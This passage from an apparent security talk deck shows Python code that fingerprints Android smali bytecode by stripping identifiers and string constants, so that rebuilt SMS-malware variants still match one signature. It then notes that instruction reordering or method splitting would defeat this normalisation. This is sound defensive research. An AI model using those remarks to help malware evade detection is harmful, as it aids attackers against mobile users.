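        line = raw.strip()
        if not line or line.startswith(".") or line.startswith("#"):
            continue                                      # directives carry the renamable names
        m = INVOKE_RE.match(line)
        if m:
            op, cls, name, desc = m.groups()
            if cls.startswith(FRAMEWORK_PREFIXES):
                out.append(f"{op} {cls}->{name}{desc}")   # framework API: stable across builds
            else:
                out.append(f"{op} APP->*")                # app-internal call: its name is noise
        elif CONST_STR_RE.match(line):
            out.append("const-string *")                  # string value is swapped per build
        else:
            out.append(line.split()[0])                   # bare opcode, registers dropped
    return out


def file_hash(smali: str) -> str:
    return hashlib.sha256(smali.encode()).hexdigest()


def fingerprint(smali: str) -> str:
    return hashlib.sha256("\n".join(tokens(smali)).encode()).hexdigest()[:16]


if __name__ == "__main__":
    for name, v in [("A", VARIANT_A), ("B", VARIANT_B), ("C", VARIANT_C)]:
        print(name, file_hash(v)[:16], fingerprint(v))
```

Identifier-blind fingerprints are why the deck's "main generic signature" keeps matching hourly builds while the 25 supplementary detections mop up variants whose code, not just names, was changed. The trade-off is obvious from the code: a generator that also reorders independent instructions or splits methods will need a looser normalisation, and every loosening step costs precision against benign apps that send SMS legitimately.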

Page 25

Acknowledgements

Page 26

Acknowledgments

• Zhi Xu, Kun Bai, and Sencun Zhu for the background on their Taplogger research.

Page 27